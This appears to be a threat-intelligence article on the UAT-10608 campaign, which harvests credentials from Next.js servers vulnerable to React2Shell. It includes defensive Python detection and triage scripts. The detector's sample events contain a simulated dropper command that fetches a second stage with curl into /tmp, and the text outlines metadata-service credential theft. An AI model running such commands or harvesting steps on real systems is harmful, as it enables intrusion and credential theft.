**Hacker Pranks Exclusive**
**Uncovering a Large-Scale Credential Harvesting Operation: UAT-10608**
Talos has disclosed a large-scale, automated credential harvesting campaign attributed to the threat cluster it tracks as UAT-10608. The operation compromised at least 766 hosts across multiple geographic regions and cloud providers, and the stolen data was collected on the attackers' own web-based collection application, NEXUS Listener, whose instances Talos was able to analyze.
**The Campaign's Methodology: A Detailed Analysis**
The UAT-10608 campaign uses a collection framework called "NEXUS Listener" and targets Next.js applications vulnerable to React2Shell (CVE-2025-55182). React2Shell is a pre-authentication remote code execution (RCE) vulnerability: the server deserializes attacker-controlled payloads from inbound HTTP requests without adequate validation or sanitization, so a single unauthenticated request can reach code execution on the host.
Once a vulnerable endpoint is identified, the rest of the chain is automated. The initial React exploit delivers a small dropper that fetches and runs the full multi-phase harvesting script; the scripts are dropped in /tmp under randomized names, and they extract credentials from the host and exfiltrate them.
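The chain above leaves a recognizable process-tree signature: a shell or downloader spawned beneath the Node.js application server that executes, or writes, a randomly named script under /tmp. The following detector is an added example, not Talos tooling or code from the campaign; the event schema (one JSON object per line with ts/host/pid/ppid/exe/cmdline), the process names in `NODE_BINARIES`, the "randomized name" heuristic and the sample events are all constructed assumptions for illustration, and a real auditd, eBPF or EDR feed would need a small adapter into this shape.

```python
"""Heuristic detection of a React2Shell-style dropper chain over
process-creation events. Added example; event format and sample data are
constructed, not from the Talos report."""
import json
import os
import re

# Assumed process names for the Next.js server and for the tools a dropper uses.
NODE_BINARIES = {"node", "nodejs", "next-server"}
SHELLS = {"sh", "bash", "dash"}
FETCHERS = {"curl", "wget"}
# Heuristic for "dropped in /tmp under a randomized name": a bare token of
# 6-32 alphanumerics with no extension, delimited by whitespace.
RANDOM_TMP = re.compile(r"(?:^|\s)(/tmp/[A-Za-z0-9_]{6,32})(?=\s|$)")

# Constructed sample feed: a benign node worker and a cron job, then the
# malicious chain node -> sh /tmp/<random> -> curl stage two into /tmp/<random>.
# 203.0.113.5 is a documentation address, not a real C2.
SAMPLE_EVENTS = """\
{"ts":"2025-12-06T02:11:03Z","host":"web-01","pid":1200,"ppid":1,"exe":"/usr/bin/node","cmdline":"node server.js"}
{"ts":"2025-12-06T02:11:04Z","host":"web-01","pid":1210,"ppid":1200,"exe":"/usr/bin/node","cmdline":"node worker.js"}
{"ts":"2025-12-06T02:11:05Z","host":"web-01","pid":900,"ppid":1,"exe":"/usr/sbin/cron","cmdline":"/usr/sbin/cron -f"}
{"ts":"2025-12-06T02:11:06Z","host":"web-01","pid":901,"ppid":900,"exe":"/bin/sh","cmdline":"/bin/sh -c /usr/local/bin/backup.sh"}
{"ts":"2025-12-06T02:11:07Z","host":"web-01","pid":1301,"ppid":1200,"exe":"/bin/sh","cmdline":"sh -c /tmp/a8f3kq2z"}
{"ts":"2025-12-06T02:11:08Z","host":"web-01","pid":1302,"ppid":1301,"exe":"/usr/bin/curl","cmdline":"curl -fsSL http://203.0.113.5/stage2 -o /tmp/q7mx4rvd"}
"""


def parse_events(text):
    """One JSON object per line -> list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def node_ancestor(pid, by_pid):
    """Return the pid of the nearest ancestor that is the app server, or None.
    The walk is bounded so malformed parent links cannot loop forever."""
    cur = by_pid.get(pid)
    for _ in range(32):
        if cur is None:
            return None
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return None
        if os.path.basename(parent["exe"]) in NODE_BINARIES:
            return parent["pid"]
        cur = parent
    return None


def detect(events):
    """Flag shells running a random /tmp script, and downloaders, that sit
    anywhere beneath the application server process."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        anc = node_ancestor(e["pid"], by_pid)
        if anc is None:
            continue  # cron jobs, init children etc. are out of scope
        name = os.path.basename(e["exe"])
        tmp_paths = RANDOM_TMP.findall(e["cmdline"])
        if name in SHELLS and tmp_paths:
            rule = "shell_exec_random_tmp"
        elif name in FETCHERS:
            rule = "fetch_under_node"
        else:
            continue
        findings.append({"pid": e["pid"], "node_pid": anc, "rule": rule,
                         "path": tmp_paths[0] if tmp_paths else None,
                         "cmdline": e["cmdline"]})
    return findings


if __name__ == "__main__":
    for finding in detect(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

The node-ancestor condition is what keeps the /tmp heuristic from firing on ordinary build or cron activity; tune `NODE_BINARIES` to the actual server binary name in your environment and treat any hit as a trigger to pull the script from /tmp before it is cleaned up.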
**The NEXUS Listener Component: A Web Application for Exfiltrated Data**
On the victim, the harvesting script tracks its execution state in a meta.json file and sends the collected data over HTTP to a C2 server running the NEXUS Listener component. NEXUS Listener is a web application that stores the exfiltrated data in a database and exposes it through a graphical interface with statistics and search capabilities.
**Exposing the Breadth of the Victim Set**
At least 766 hosts, spread across multiple geographic regions and cloud providers, were compromised within a 24-hour period. The NEXUS Listener interface lets its operators browse every compromised host and select one to view the data exfiltrated from it.
**Data Exposed: A Treasure Trove for Attackers**
Talos' analysis of the NEXUS Listener instances shows what the campaign collected from each host:
* Environ.txt and jsenv.txt: the runtime environment of the compromised application process, which exposes the third-party API credentials held in its environment variables.
* SSH keys, found on 78% of hosts: a harvested private key enables lateral movement to any system that trusts it.
* Cloud credentials: on cloud-hosted targets the script queries the AWS Instance Metadata Service (IMDS), the GCP metadata server and Azure IMDS, which return the temporary credentials of the IAM role, service account or managed identity attached to the instance.
* Kubernetes tokens: depending on the cluster's RBAC configuration, a stolen token lets an attacker enumerate cluster resources or escalate to cluster-admin.
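A responder handling one of these hosts has to answer the same question the attacker's environ.txt answers: which credentials were reachable from the application process, and therefore which ones to rotate. The script below is an added example of that triage, not Talos' analysis code; the environment dump is constructed (the AWS access key and secret are the placeholder values from AWS's own documentation), and the classification rules, category names and rotation actions are the author's assumptions rather than anything the report specifies.

```python
"""Triage of a captured process environment: parse it, classify the
credential-bearing variables, and emit a masked rotation list.
Added example; sample data and rules are constructed."""
import re

# Constructed /proc/<pid>/environ-style dump (NUL-separated). The AWS values
# are the documentation placeholders AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY.
SAMPLE_ENVIRON = b"\0".join([
    b"PATH=/usr/local/bin:/usr/bin",
    b"NODE_ENV=production",
    b"PORT=3000",
    b"AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    b"AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    b"DATABASE_URL=postgres://app:s3cr3tpw@db.internal:5432/app",
    b"PAYMENTS_API_KEY=pk_constructed_0123456789",
    b"KUBERNETES_SERVICE_HOST=10.96.0.1",
    b"SENTRY_DSN=https://abc123@o1.ingest.sentry.io/42",
]) + b"\0"

# (category, name pattern, value pattern, action); first matching rule wins,
# so the specific AWS and URL rules run before the generic name-based one.
RULES = [
    ("aws_access_key",
     re.compile(r"^AWS_(ACCESS_KEY_ID|SECRET_ACCESS_KEY|SESSION_TOKEN)$"),
     re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
     "rotate the IAM access key and review CloudTrail for use of the old one"),
    ("url_with_password", None,
     re.compile(r"^[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
     "rotate the embedded password and audit the backing service"),
    ("kubernetes_in_cluster",
     re.compile(r"^KUBERNETES_SERVICE_HOST$"), None,
     "treat the mounted service-account token as stolen: rotate it and review its RBAC bindings"),
    ("generic_secret",
     re.compile(r"SECRET|TOKEN|PASSWORD|PASSWD|API_KEY|PRIVATE_KEY|CREDENTIAL|ACCESS_KEY", re.I),
     None, "rotate with the issuing provider"),
]


def parse_environ(raw):
    """Accept /proc/<pid>/environ (NUL-separated) or `env` output (newline-
    separated) and return an ordered dict of KEY -> VALUE."""
    if isinstance(raw, bytes):
        raw = raw.decode("utf-8", errors="replace")
    sep = "\0" if "\0" in raw else "\n"
    env = {}
    for entry in raw.split(sep):
        if "=" not in entry:
            continue  # skips the empty trailing entry and malformed lines
        key, _, value = entry.partition("=")
        env[key] = value
    return env


def mask(value, keep=4):
    """Keep only a short prefix so the triage report does not re-expose the secret."""
    return f"{value[:keep]}...[{len(value)}]"


def triage(env):
    """Classify each variable against RULES and return the rotation list."""
    findings = []
    for var, value in env.items():
        for category, name_re, value_re, action in RULES:
            if (name_re and name_re.search(var)) or (value_re and value_re.search(value)):
                findings.append({"var": var, "category": category,
                                 "value": mask(value), "action": action})
                break
    return findings


if __name__ == "__main__":
    for finding in triage(parse_environ(SAMPLE_ENVIRON)):
        print(f"{finding['var']:<24} {finding['category']:<22} {finding['value']:<16} {finding['action']}")
```

Run it against a real /proc/PID/environ copy taken from the compromised host before it is rebuilt; a variable the rules miss (the SENTRY_DSN in the sample has no password and is correctly left alone) still deserves a manual look, since the attacker's copy contains every variable, not only the ones that match.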
**Implications for Organizations: Protect Your Assets**
This operation is a reminder that a single pre-authentication RCE in a web application exposes every credential reachable from that process: environment variables, SSH keys, cloud metadata credentials and Kubernetes tokens alike. Organizations should:
* Hunt for artifacts related to UAT-10608, including hits on Snort SID 65554 and the published IOCs.
* Review cloud IAM configuration: scope the roles and identities attached to instances and pods to least privilege, and treat any credential reachable from a compromised host (instance-role credentials, service-account tokens, SSH keys) as stolen and rotate it.
* Patch vulnerable components promptly, starting with Next.js deployments affected by CVE-2025-55182.
* Maintain monitoring and detection capable of catching shells and downloaders spawned by the application server process.
**Conclusion**
The UAT-10608 campaign shows how quickly a single pre-authentication RCE is turned into large-scale credential theft. Understanding its methodology and tooling, from the initial dropper to the NEXUS Listener collection point, is what lets defenders hunt for it now and prepare for the next campaign that follows the same playbook.
**Additional Resources:**
* IOCs for UAT-10608 are available on our GitHub repository here.
* Read Talos' full analysis of the NEXUS Listener instance data.
* Stay up to date with the latest threat intelligence and research on Hacker Pranks.